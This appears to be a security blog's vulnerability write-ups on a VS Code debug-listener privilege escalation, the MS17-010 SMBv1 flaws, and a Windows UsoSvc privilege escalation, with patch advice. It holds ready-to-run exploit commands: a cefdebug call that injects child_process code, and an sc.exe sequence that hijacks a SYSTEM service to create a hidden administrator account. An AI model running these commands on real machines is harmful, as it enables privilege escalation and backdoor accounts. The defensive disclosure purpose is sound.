goodlandsecurity (8)

Vulnerability:

• An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer. A local attacker who successfully exploited the vulnerability could inject arbitrary code to run in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
  

Software Versions Affected:

• All versions < 1.39.1
  

Vulnerability Severity:

• High
  

Vulnerability Fix:

• Upgrade VS Code to version 1.39.1 or later.
  

Vulnerability POC:

• If Visual Studio code runs as Administrator, privileges can be elevated to the highest level, i.e. NT AUTHORITY\SYSTEM.
  
• If Visual Studio Code runs as another user, command execution can be achieved as that user.
  
• If Visual Studio Code runs in High Integrity context, any UAC settings can bypassed and can elevate from Low/Medium levels.
  
  
• Linux (Article detailing the exploit):
  
  1. ps aux | grep inspect
     
     • Find the debug port
       
  2. node index.js 127.0.0.1 <PORT> <COMMAND>
     
     • Run index.js supplied with the ip address, port, and command you want to run
       
       
• Windows:
  
  1. ./cefdebug.exe
     
     • Find the debug port
       
     • cefdebug is a minimal commandline utility and/or reference code for using libwebsockets to connect to an electron/CEF/chromium debugger.
       2 ./cefdebug.exe —url ws://127.0.0.1:<PORT>/<UUID> —code “process.mainModule.require(‘child_process’).exec(’<COMMAND>’)”
       
     • Run cefdebug supplied with the debug websocket url and the command you want to run
       

Vulnerability:

• Remote code execution vulnerabilities exist in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerabilities could gain the ability to execute code on the target server. To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.
  

Vulnerability Disclosure date:

• 2017-03-14
  

Operating Systems Affected:

• Windows 2000 SP4
  
• Windows XP SP2, SP3
  
• Windows 2003 SP2 and R2 SP2
  
• Microsoft Windows Vista SP2
  
• Windows Server 2008 SP1, SP2 and R2 SP1
  
• Windows 7 SP1
  
• Windows 8.1
  
• Windows Server 2012 Gold and R2
  
• Windows RT 8.1
  
• Windows 10 Gold, 1511, and 1607 and Pro 10240
  
• Windows Server 2016
  

Vulnerability Severity:

• Critical
  

Vulnerability Fix:

• Apply the MS17-010 security update.
  

Vulnerability POC:

• SMB Remote Code Execution Scanner (Nmap)
  
• SMB Remote Code Execution Scanner (Metasploit)
  
• ‘EternalRomance’/‘EternalSynergy’/‘EternalChampion’ SMB Remote Code Execution (Metasploit)
  
• Windows 7/2008 R2 – ‘EternalBlue’ SMB Remote Code Execution
  
• Windows 8/8.1/2012 R2 (x64) – ‘EternalBlue’ SMB Remote Code Execution
  
• Windows Server 2008 R2 (x64) – ‘SrvOs2FeaToNt’ SMB Remote Code Execution
  
• Windows 7/8.1/2008 R2/2012 R2/2016 R2 – ‘EternalBlue’ SMB Remote Code Execution
  
• Windows 2000/XP/2003/2008/7/8.1 (x86) & Windows XP/2003 R2/2008/7/2008 R2/8.1/2012 R2/10 Pro/2016 (x64) ‘Send and Execute’ SMB Remote Code Execution(generate payload for reverse shell)
  

NSA Exploit Information:

• Eternalblue requires only access to IPC$ to exploit a target while other exploits require access to named pipe too. So the exploit always works against Windows < 8 in all configuration (if tcp port 445 is accessible). However, Eternalblue has a chance to crash a target higher than other exploits.
  
• Eternalchampion requires access to named pipe. The exploit has no chance to crash a target.
  
• Eternalromance requires access to named pipe. The exploit can target Windows < 8 because the bug for info leak is fixed in Windows 8. The exploit should have a chance to crash a target lower than Eternalblue. I never test a reliable of the exploit.
  
• Eternalsynergy requires access to named pipe. I believe this exploit is modified from Eternalromance to target Windows 8 and later. Eternalsynergy uses another bug for info leak and does some trick to find executable memory (I do not know how it works because I read only output log and pcap file).
  

This is an elevation of privilege vulnerability that exists when Windows improperly handles authentication requests by leveraging the Update Orchestrator Service. If an attacker successfully exploits this vulnerability they can run processes in an elevated context.

Prerequisite:

The Update Orchestrator Service runs as NT AUTHORITY\SYSTEM and any user in the group NT AUTHORITY\SERVICE have full access to modify the service.

It is known to affect Windows 10 1803 and above that have not been updated with the November 12th, 2019 security update patch (or above).

Exploitation:

Create tmpUser, add to local administrators group, and reset the service to its default state.

sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net user /add tmpUser tmpPassword123"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net localgroup Administrators /add tmpUser"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="C:\Windows\System32\svchost.exe -k netsvcs -p"
sc.exe start UsoSvc